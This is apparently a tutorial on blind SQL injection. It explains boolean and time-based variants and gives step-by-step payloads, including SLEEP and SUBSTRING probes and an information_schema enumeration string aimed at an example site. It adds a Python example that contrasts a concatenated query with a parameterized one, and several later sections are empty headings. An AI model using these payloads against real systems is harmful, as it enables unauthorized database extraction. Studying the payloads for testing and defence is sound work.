🕵️ What is Blind SQL Injection?

Blind SQL Injection is a type of SQL injection where the application does not display database errors or query results directly in the response. Instead, attackers must infer the result of injected queries from indirect clues such as response time, status codes, or other changes in application behavior.

🧬 Types of Blind SQLi

1. Boolean-Based (Content-Based)

The application behaves differently depending on whether the injected condition is true or false.

GET /product?id=5 AND 1=1 --> returns full page
GET /product?id=5 AND 1=2 --> returns blank or error page

2. Time-Based

Injects SQL functions such as SLEEP() (MySQL) or pg_sleep() (PostgreSQL) that delay query execution, then infers true/false from how long the response takes.

GET /product?id=5 AND SLEEP(5) --> page delays 5 seconds (true)
GET /product?id=5 AND SLEEP(0) --> no delay (false)

🛠️ Exploiting Blind SQLi: Step-by-Step

Step 1: Identify injection point

Use a test payload like ' AND 1=1-- or ' AND SLEEP(5)-- in any user-controlled input, such as URL query parameters, form fields, or HTTP headers.

Step 2: Confirm behavior change

Compare response patterns (HTML content, length, response time) for true vs. false conditions.

Step 3: Extract information bit by bit

Use binary inference to recover the value one character at a time, testing each position against candidate characters (or narrowing the character range with a binary search). For example:

GET /product?id=1 AND (SELECT SUBSTRING(database(),1,1))='m'

Check whether the page behavior changes when the guess is correct. Automate this with tools like sqlmap.

🌐 Real-World Example

Assume the following vulnerable endpoint:

https://vuln.site/item.php?id=2

Time-based test:

https://vuln.site/item.php?id=2' AND SLEEP(5)--+

If the response is delayed, the input is injectable. We can now enumerate users or schema names:

' AND (SELECT CASE WHEN (SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1),1,1)='u') THEN SLEEP(5) ELSE 0 END)--+
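The root cause behind the boolean oracle described above is a query built by string concatenation. The following is an added Python/sqlite3 example, not code from the original article: a constructed product table, the vulnerable lookup beside its hardened form (input allow-listing plus a bound parameter), and a check that reports whether the two page-shaped conditions (id=5 AND 1=1 vs. id=5 AND 1=2) still behave differently. Table and function names are assumptions for illustration.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the article's /product?id=N backend.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)",
                     [(5, "lamp"), (6, "desk")])
    return conn


def lookup_vulnerable(conn, raw_id):
    # Concatenation: whatever arrives in the id parameter is parsed as SQL,
    # so "5 AND 1=2" silently changes the WHERE clause.
    sql = "SELECT name FROM product WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, raw_id):
    # Allow-list the expected shape (a non-negative integer), then bind the
    # value as a parameter so the database never parses it as SQL text.
    if not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT name FROM product WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(raw_id),))]


def boolean_oracle_exists(lookup, conn):
    # Defender-side regression check: if a true and a false condition appended
    # to a valid id yield different results, the endpoint leaks a boolean
    # oracle of the kind the article describes.
    try:
        true_case = lookup(conn, "5 AND 1=1")
        false_case = lookup(conn, "5 AND 1=2")
    except ValueError:
        return False  # input rejected before reaching the database
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("vulnerable leaks oracle:", boolean_oracle_exists(lookup_vulnerable, db))
    print("hardened leaks oracle:  ", boolean_oracle_exists(lookup_hardened, db))
```

The hardened lookup raises on malformed ids rather than guessing, so a web handler should map that ValueError to a 400 response and log it, which also gives detection a clean signal.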

🔧 Tools to Automate Blind SQLi

💡 Pro Tips

🛡️ How to Prevent Blind SQLi

📚 Further Reading